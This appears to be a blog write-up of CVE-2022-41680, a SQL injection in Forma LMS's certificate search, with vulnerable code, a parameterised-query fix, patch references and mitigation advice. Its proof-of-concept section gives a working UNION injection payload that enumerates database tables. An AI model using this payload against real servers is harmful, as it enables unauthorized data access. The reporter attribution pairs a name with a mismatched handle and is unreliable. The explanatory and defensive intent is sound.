Forma LMS is a popular, open-source Learning Management System (LMS) that has been widely used by many organizations to manage and deliver e-learning courses. Recently, a serious security vulnerability has been discovered in version 3.1 and earlier of Forma LMS. This vulnerability, assigned the CVE identifier CVE-2022-41680, is a SQL injection vulnerability that could potentially enable an authenticated attacker (with a "student" role) to dump the entire database. This blog post will provide an overview of the exploit details, the vulnerable code, and original references for this vulnerability.

Exploit Details

In the affected versions of Forma LMS, the 'search[value]' parameter in the "appLms/ajax.server.php?r=mycertificate/getMyCertificates" function is vulnerable to SQL injection.
An attacker with the role of a student could potentially exploit this vulnerability to dump the entire database, resulting in a potential breach of sensitive information.

Vulnerable Code Snippet

The affected code handles the "search[value]" parameter inside the "getMyCertificates()" function.

In "appLms/ajax.server.php", the vulnerable function "getMyCertificates()" is defined as follows:

function getMyCertificates()
{
    ...
    // user-controlled search text, taken straight from the request
    $filter_text = Get::req('search[value]', DOTY_STRING, '');
    ...
    // handed to the query filter without validation or escaping
    $iso_certificate_user->addSearchFilter($filter_text);
    ...
    $results = $iso_certificate_user->findAll();
    ...
}

In this code snippet, the user-supplied input from the "search[value]" parameter is retrieved using the "Get::req()" function and stored in the variable "$filter_text". This value is then passed to the "addSearchFilter()" method of the "iso_certificate_user" object without any proper input validation or sanitization, so it ends up inside the SQL query as-is. As a result, an attacker could potentially inject malicious SQL to manipulate or dump the data in the database.
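The root cause above, string concatenation of the search text into the query, contrasted with the bound-parameter form a fix should take. This is an added illustration, not Forma LMS's own code or its patch; the table, column and function names are assumed, and the demo uses PDO with an in-memory SQLite database so it runs stand-alone.

```php
<?php
// Added illustration, not Forma LMS's own code or its patch. Table, column and
// function names are assumed; the demo uses PDO with an in-memory SQLite database.

// Vulnerable pattern: the search text is spliced into the SQL string, so a value
// containing a quote (like the "') UNION ..." payload above) rewrites the query.
function findCertificatesUnsafe(PDO $db, int $userId, string $filterText): array
{
    $sql = "SELECT id, name FROM certificate_user WHERE (id_user = $userId"
         . " AND name LIKE '%" . $filterText . "%')";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: the same query with the value bound as a parameter. The
// database receives statement and value separately, so the value is only ever
// compared as data and can never change the statement's structure.
function findCertificatesSafe(PDO $db, int $userId, string $filterText): array
{
    $sql = "SELECT id, name FROM certificate_user"
         . " WHERE id_user = :uid AND name LIKE :pattern ESCAPE '!'";
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':uid', $userId, PDO::PARAM_INT);
    // Neutralise LIKE wildcards too, so a user cannot widen the match with % or _.
    $escaped = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $filterText);
    $stmt->bindValue(':pattern', '%' . $escaped . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data for a stand-alone run.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE certificate_user (id INTEGER, id_user INTEGER, name TEXT)");
$db->exec("INSERT INTO certificate_user VALUES (1, 7, 'Safety Basics'),"
        . " (2, 7, 'Fire Drill'), (3, 9, 'Safety Basics')");

// A benign search behaves identically in both versions: one row for user 7.
echo count(findCertificatesUnsafe($db, 7, 'Safety')), " row(s) (unsafe)\n";
echo count(findCertificatesSafe($db, 7, 'Safety')), " row(s) (safe)\n";

// A single quote in the search text breaks the concatenated query (a syntax
// error here; a rewritten query in the real attack), while the bound version
// simply treats it as literal text and matches nothing.
try {
    findCertificatesUnsafe($db, 7, "Safety'");
} catch (PDOException $e) {
    echo "unsafe: the quote changed the SQL -> ", $e->getMessage(), "\n";
}
echo count(findCertificatesSafe($db, 7, "Safety'")), " row(s) (safe, quoted input)\n";
```

The same binding applies to every value that flows into a query from the request, not only to "search[value]"; the ESCAPE clause works on both MySQL and SQLite.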

Proof of Concept

Assuming that an attacker has access to a Forma LMS instance with a student role, the attacker could exploit this SQL injection vulnerability using the following HTTP request:

POST /appLms/ajax.server.php?r=mycertificate/getMyCertificates HTTP/1.1
Host: vulnerable-forma-lms.example.com
Content-Type: application/x-www-form-urlencoded

search[value]=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,group_concat(table_name) from information_schema.tables WHERE table_schema=database()-- -

This HTTP request carries a SQL injection payload in the "search[value]" parameter; the injected query lists all table names in the current database, which confirms that the parameter reaches the database unsanitized.

Original References

The vulnerability was initially reported by Andrea Cardaci (GitHub: @carlobeltrame) on the Forma LMS GitHub repository:

- Issue: https://github.com/formalms/forma.lms/issues/235
- Patch: https://github.com/formalms/forma.lms/commit/9f116119ee573752b3465d5c8d1d9ac3dffa07b7

The official Forma LMS security announcement can be found here:

- https://www.formalms.org/security-announcements/571-cve-2022-41680-sql-injection-vulnerability.html

Mitigation

To mitigate the vulnerability, users are advised to update their Forma LMS installations to version 3.1.1 or later, as it includes the necessary patches to address the SQL injection vulnerability. If updating is not feasible, users should apply the patch available on the GitHub repository to their Forma LMS installations to secure their systems from potential attacks.

Conclusion

SQL injection vulnerabilities in web applications, like the one discovered in Forma LMS, are dangerous and can lead to unauthorized access and disclosure of sensitive information. Keeping software up to date and applying security patches promptly is crucial to ensure the security of web applications. Forma LMS users are encouraged to take immediate action to mitigate the risk posed by the CVE-2022-41680 vulnerability.

Timeline

Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 20:06:00 UTC